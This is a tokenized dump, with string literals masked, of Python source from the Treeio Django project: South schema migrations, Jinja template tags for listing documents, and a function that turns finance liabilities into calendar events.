) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { 
'<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:value>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:body>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , 
'<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:url>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' 
: { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } <EOL> } <EOL> complete_apps = [ '<STR_LIT>' ] </s>
<s> """<STR_LIT>""" <EOL> from coffin import template <EOL> from treeio . core . rendering import render_to_string <EOL> from jinja2 import contextfunction , Markup <EOL> from django . template import RequestContext <EOL> register = template . Library ( ) <EOL> @ contextfunction <EOL> def documents_document_list ( context , documents , skip_group = False ) : <EOL> "<STR_LIT>" <EOL> request = context [ '<STR_LIT>' ] <EOL> response_format = '<STR_LIT:html>' <EOL> if '<STR_LIT>' in context : <EOL> response_format = context [ '<STR_LIT>' ] <EOL> return Markup ( render_to_string ( '<STR_LIT>' , <EOL> { '<STR_LIT>' : documents , <EOL> '<STR_LIT>' : skip_group } , <EOL> context_instance = RequestContext ( request ) , <EOL> response_format = response_format ) ) <EOL> register . object ( documents_document_list ) <EOL> @ contextfunction <EOL> def documents_file_list ( context , files , skip_group = False ) : <EOL> "<STR_LIT>" <EOL> request = context [ '<STR_LIT>' ] <EOL> response_format = '<STR_LIT:html>' <EOL> if '<STR_LIT>' in context : <EOL> response_format = context [ '<STR_LIT>' ] <EOL> return Markup ( render_to_string ( '<STR_LIT>' , <EOL> { '<STR_LIT>' : files , '<STR_LIT>' : skip_group } , <EOL> context_instance = RequestContext ( request ) , <EOL> response_format = response_format ) ) <EOL> register . object ( documents_file_list ) <EOL> @ contextfunction <EOL> def documents_weblink_list ( context , links , skip_group = False ) : <EOL> "<STR_LIT>" <EOL> request = context [ '<STR_LIT>' ] <EOL> response_format = '<STR_LIT:html>' <EOL> if '<STR_LIT>' in context : <EOL> response_format = context [ '<STR_LIT>' ] <EOL> return Markup ( render_to_string ( '<STR_LIT>' , <EOL> { '<STR_LIT>' : links , '<STR_LIT>' : skip_group } , <EOL> context_instance = RequestContext ( request ) , <EOL> response_format = response_format ) ) <EOL> register . 
object ( documents_weblink_list ) <EOL> @ contextfunction <EOL> def documents_objects_list ( context , objects , folder , skip_group = False ) : <EOL> "<STR_LIT>" <EOL> request = context [ '<STR_LIT>' ] <EOL> response_format = '<STR_LIT:html>' <EOL> if '<STR_LIT>' in context : <EOL> response_format = context [ '<STR_LIT>' ] <EOL> return Markup ( render_to_string ( '<STR_LIT>' , <EOL> { '<STR_LIT>' : objects , <EOL> '<STR_LIT>' : skip_group , '<STR_LIT>' : folder } , <EOL> context_instance = RequestContext ( request ) , <EOL> response_format = response_format ) ) <EOL> register . object ( documents_objects_list ) </s>
<s> """<STR_LIT>""" <EOL> from treeio . finance . models import Liability <EOL> from treeio . core . models import Object <EOL> from treeio . events . rendering import EventRenderer <EOL> from django . db . models import Q <EOL> import datetime <EOL> def get_events ( request ) : <EOL> "<STR_LIT>" <EOL> events = [ ] <EOL> query = Q ( due_date__isnull = False ) <EOL> liabilities = Object . filter_by_request ( <EOL> request , manager = Liability . objects . filter ( query ) ) <EOL> for liability in liabilities : <EOL> if liability . due_date : <EOL> old = liability . due_date <EOL> new_due_date = datetime . datetime ( <EOL> year = old . year , month = old . month , day = old . day , hour = <NUM_LIT:12> , minute = <NUM_LIT:0> , second = <NUM_LIT:0> ) <EOL> event = EventRenderer ( <EOL> liability . name , None , new_due_date , liability . get_absolute_url ( ) ) <EOL> event . css_class += "<STR_LIT>" <EOL> events . append ( event ) <EOL> return events </s>
<s> import datetime <EOL> from south . db import db <EOL> from south . v2 import SchemaMigration <EOL> from django . db import models <EOL> class Migration ( SchemaMigration ) : <EOL> def forwards ( self , orm ) : <EOL> db . alter_column ( '<STR_LIT>' , '<STR_LIT>' , self . gf ( <EOL> '<STR_LIT>' ) ( to = orm [ '<STR_LIT>' ] , null = True ) ) <EOL> def backwards ( self , orm ) : <EOL> db . alter_column ( '<STR_LIT>' , '<STR_LIT>' , self . gf ( <EOL> '<STR_LIT>' ) ( to = orm [ '<STR_LIT>' ] , null = True ) ) <EOL> models = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:email>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { 
'<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:password>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:username>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { 
'<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:body>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : 
'<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:object_name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , 
'<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : 
'<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:label>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : 
